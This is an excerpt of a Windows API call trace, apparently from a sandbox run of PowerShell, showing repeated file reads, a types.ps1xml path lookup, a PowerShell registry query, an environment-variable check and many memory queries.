	[0348.155] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.155] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.155] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.156] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.156] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.156] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.156] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.157] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.158] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.158] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.159] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.159] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.159] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.159] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.160] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.160] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.160] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.160] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.161] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.161] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.161] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.161] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.162] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.162] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.170] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.170] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.171] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.171] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.171] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.171] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.172] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.172] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.172] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1b4, lpOverlapped=0x0) returned 1
	[0348.172] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x0, lpOverlapped=0x0) returned 1
	[0348.172] CloseHandle (hObject=0x320) returned 1
	[0348.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0348.173] SetErrorMode (uMode=0x1) returned 0x1
	[0348.173] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd6c0 | out: lpFileInformation=0x1cd6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0348.173] SetErrorMode (uMode=0x1) returned 0x1
	[0348.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0348.173] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd7a8 | out: phkResult=0x1cd7a8*=0x320) returned 0x0
	[0348.173] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd72c, lpData=0x0, lpcbData=0x1cd728*=0x0 | out: lpType=0x1cd72c*=0x1, lpData=0x0, lpcbData=0x1cd728*=0x56) returned 0x0
	[0348.173] CoTaskMemAlloc (cb=0x5a) returned 0x444480
	[0348.173] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd6fc, lpData=0x444480, lpcbData=0x1cd6f8*=0x56 | out: lpType=0x1cd6fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd6f8*=0x56) returned 0x0
	[0348.174] CoTaskMemFree (pv=0x444480) 
	[0348.174] RegCloseKey (hKey=0x320) returned 0x0
	[0348.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0348.174] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0348.840] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.847] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.848] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.849] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.849] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.849] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.849] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.178] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.192] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.192] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.193] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.193] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.193] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.193] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.193] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.194] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.198] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.202] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.202] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.203] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.203] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.203] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.204] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.204] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.204] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.204] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.204] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.205] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.205] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.205] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.207] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.208] VirtualQuery (in: lpAddress=0x1cc4a0, lpBuffer=0x1cd360, dwLength=0x30 | out: lpBuffer=0x1cd360*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.209] VirtualQuery (in: lpAddress=0x1cc4a0, lpBuffer=0x1cd360, dwLength=0x30 | out: lpBuffer=0x1cd360*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.209] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.210] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.490] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.491] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.491] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.494] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0349.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0349.494] CoTaskMemFree (pv=0x436d30) 
	[0349.495] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.498] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.498] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.498] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.499] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.499] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.499] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.500] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
